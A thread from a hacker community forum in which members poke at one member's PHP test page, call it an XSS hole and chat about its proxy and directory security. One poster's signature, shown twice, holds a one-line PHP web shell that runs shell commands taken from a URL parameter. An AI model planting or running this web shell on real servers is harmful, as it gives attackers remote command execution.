Follow us on Twitter!
You cannot teach a man anything; you can only help him find it within himself. - Galileo
Wednesday, August 23, 2017
Navigation
Home
 Find:
 Information:
Learn
Communicate
Submit
Shop
Challenges
 Exploit:
 Programming:
 Think:
 Track:
 Patch:
 Other:
 Need Help?
Other
Members Online
Total Online: 47
Guests Online: 45
Members Online: 2

Registered Members: 101632
Newest Member: Kakonaldo
Latest Articles
View Thread

HellBound Hackers | Computer General | Web Server

Author

What do you see

Scar0ptics
Member



Posts: 223
Location: ∆ P®0X¥ W0R|D ∆
Joined: 19.11.13
Rank:
Mad User
Posted on 30-07-17 16:54
You should see a white page executing a simple PHP script displaying identifiable information.


hidden-network.dd. . .

Edited by Scar0ptics on 30-07-17 17:05
Author

RE: What do you see

Huitzilopochtli
Member



Posts: 1531
Location:
Joined: 19.02.13
Rank:
God
Posted on 30-07-17 18:25
Aye nice XSS.
Author

RE: What do you see

gobzi
Member



Posts: 77
Location: Hobbiton
Joined: 26.05.16
Rank:
HBH Guru
Posted on 31-07-17 09:33
I see that http://imgur.com/. . . Frown


It also reflects your ip, not mine Grin


<pre> <?=`$_GET[1]`?>

Ima_noob# cat * | egrep "Subject|Date|filename=" > agrrr


gobzi.bounceme.net

Edited by gobzi on 31-07-17 09:36
gobzi.ddns.net
Author

RE: What do you see

Scar0ptics
Member



Posts: 223
Location: ∆ P®0X¥ W0R|D ∆
Joined: 19.11.13
Rank:
Mad User
Posted on 02-08-17 02:38
I noticed that lol

I will take a look at the configuration tonight.
Author

RE: What do you see

gobzi
Member



Posts: 77
Location: Hobbiton
Joined: 26.05.16
Rank:
HBH Guru
Posted on 02-08-17 10:55
http://imgur.com/. . .


<pre> <?=`$_GET[1]`?>

Ima_noob# cat * | egrep "Subject|Date|filename=" > agrrr


gobzi.bounceme.net
gobzi.ddns.net
Author

RE: What do you see

Huitzilopochtli
Member



Posts: 1531
Location:
Joined: 19.02.13
Rank:
God
Posted on 02-08-17 15:24
Meat Loaf says don't be sad .......cause zero out of four ain't bad.
Author

RE: What do you see

Scar0ptics
Member



Posts: 223
Location: ∆ P®0X¥ W0R|D ∆
Joined: 19.11.13
Rank:
Mad User
Posted on 02-08-17 17:49
I still need to take a look at the script tonight.


The proxy appears to working with plain text and PHP, but I need to re-write the PHP script apparently or there might be other issues, possibly.

The directory security is not that tight eitherGrin

Edited by Scar0ptics on 02-08-17 17:53
Author

RE: What do you see

Scar0ptics
Member



Posts: 223
Location: ∆ P®0X¥ W0R|D ∆
Joined: 19.11.13
Rank:
Mad User
Posted on 02-08-17 17:51
Check out the virtual host configuration on the other forum.